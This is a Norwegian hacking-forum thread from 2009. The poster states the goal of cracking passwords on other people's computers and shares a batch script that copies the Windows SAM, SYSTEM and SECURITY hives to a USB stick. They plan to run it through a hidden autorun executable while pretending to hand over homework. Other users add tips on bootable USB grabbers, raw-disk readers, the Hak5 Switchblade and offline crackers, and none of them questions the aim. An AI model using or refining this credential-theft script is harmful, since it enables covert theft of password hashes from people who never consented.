Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  13 1665
Iden er og knekke passord på andres maskiner,
Testa det i dag, men del klarer ikke kopiere ut sam fra config. Poenget er at det skal fort og effektift skal kopiere ut infoen med en minnepenn.

laga et bat script,

Kode

@echo off
:1
md ..\\sam_system01
cls
xcopy %systemroot%\repair\SAM ..\\sam_system01\
cls
xcopy %systemroot%\repair\system ..\\sam_system01\
cls
xcopy %systemroot%\repair\SAM.bak ..\\sam_system01\
cls
xcopy %systemroot%\repair\system.bak ..\\sam_system01\
cls

:2
md ..\\sam_system02
cls
xcopy %systemroot%\system32\config\SAM ..\\sam_system02\
cls
xcopy %systemroot%\system32\config\system ..\\sam_system02\
cls
xcopy %systemroot%\system32\config\SAM.bak ..\\sam_system02\
cls
xcopy %systemroot%\system32\config\system.bak ..\\sam_system02\
cls
xcopy %systemroot%\system32\config\SECURITY ..\\sam_system02\
cls
xcopy %systemroot%\system32\config\SECURITY.bak ..\\sam_system02\
cls
:3
start ..\\
Det er problemer med dette scriptet,
1. det funker ikke på vista.
2. Det kommer oppe en error som sier "delingstilatelse misslykkes" eller noe slik. på alle punkat mellom :2 og :3
3. sam og system filene i repair inneholder ikkje den infoen eg treng.

Har Cain, Saminside og LC4 instalert på pcen min, ikkje "offertets sin".
Har maks tilgang til pcen i halvt min eller noe om gangen. så det fuker ikkje med og opne program osv, bere minnepen inn, kopiere en fil så ut igjen, har laga et autorun script og kan konvertere til .exe me en converter slik det ligg skult i bakgrunnen.

håper noen kan hjelpe
Nå skal det da vitterlig ikke gå å kopiere ut SAM fra en kjørende windowsinstalasjon, så der er du allerede fortapt.
Sitat av meitemark Vis innlegg
Nå skal det da vitterlig ikke gå å kopiere ut SAM fra en kjørende windowsinstalasjon, så der er du allerede fortapt.
Vis hele sitatet...
Takker

Noen som vet en metode som gjør dette elle lager en PWDUMP file eller lignene?
Sist endret av FpsDog; 10. september 2009 kl. 16:14.
Du har bedre sjanse ved å lage en boot-bar minnepenn/cd som henter ut SAM-filen automatisk, for så å plugge den inn og boote fra den.
Sist endret av plohg; 10. september 2009 kl. 16:19.
Sam filen ligger under C: \WINDOWS\repair, hvis pcen har kjørt system restore noen gang(den kan kopieres når du kjører windows.)
Sist endret av MikeHunt; 10. september 2009 kl. 17:09.
Hmm,, takker , me plohg er inne på noe, me poenget er og plugge i minnepenne og ta en fil over på test pcen, og før ein klarer opne minnepnnen har ein kopiert filene.

tankeekspriment
"har lagt leksa inn på minnepenn, plug den i og autorun, xtar og gjør dette, tenker ikke over kosikvensene og legger leksa over, men før dette har batfila eller hav det er kopiert sam, system og eventuelt SECURITY over på penen slik den skulte fila gjør.
Sist endret av FpsDog; 10. september 2009 kl. 21:10.
Sitat av MikeHunt Vis innlegg
Sam filen ligger under C: \WINDOWS\repair, hvis pcen har kjørt system restore noen gang(den kan kopieres når du kjører windows.)
Vis hele sitatet...
Sist jeg husket lå den under C:\Windows\System32\config
Sitat av Ondskap Vis innlegg
Sist jeg husket lå den under CWindows\System32\config
Vis hele sitatet...
Ja, den som er i bruk ligger der. Men det ligger en kopi av denne filen under repair, som ikke er i bruk, noe som gjør at du kan bruke denne filen til evt samInside o.l.

Les innlegget en gang til.
du kan lese ut sam fila selv om den er i bruk, du trenger bare program som leser rett fra disken å driter i oset, eks akronis/ghost. disse tar helle disken, men er sikert noen som har laget noen som kun leser ut sam fila.
Takker ranvik,
det hadde vore greit med et slik program, men det er jo ikke bare ok kreve kreve, Men
Ja, den som er i bruk ligger der. Men det ligger en kopi av denne filen under repair, som ikke er i bruk, noe som gjør at du kan bruke denne filen til evt samInside o.l.

Les innlegget en gang til
Vis hele sitatet...
.

Problemet er berre det lig begrensa med inbfo, slik som hjelpeasisten, gjest osv. men ingen passordbeskytta brukere
Joda det går an, rotet litt med det der for noen år siden. Hak5 har en guide på det, om ikke den fungerer for deg så har du ihvertfall et utgangspunkt for å søke videre..
Sist endret av pidget; 11. september 2009 kl. 10:02.
enkleste måten er å boote cd, minne stick som henter ut SAM filen.
Husker ikke hva jeg søkte på da jeg fant det på nette for en stund siden, men kan sende deg filen om du ønkser det.
▼ ... over en uke senere ... ▼
Sitat av pidget Vis innlegg
Joda det går an, rotet litt med det der for noen år siden. Hak5 har en guide på det, om ikke den fungerer for deg så har du ihvertfall et utgangspunkt for å søke videre..
Vis hele sitatet...
Takker, driver og eksprimenterer, dne med 7z er genial
Gonzor switchblade anbefales på det sterkeste:
http://wiki.hak5.org/wiki//USB_Switc...D-_SwitchBlade
Bruk f.eks. denne minnepennen:
http://www.komplett.no/k/ki.aspx?sku=334628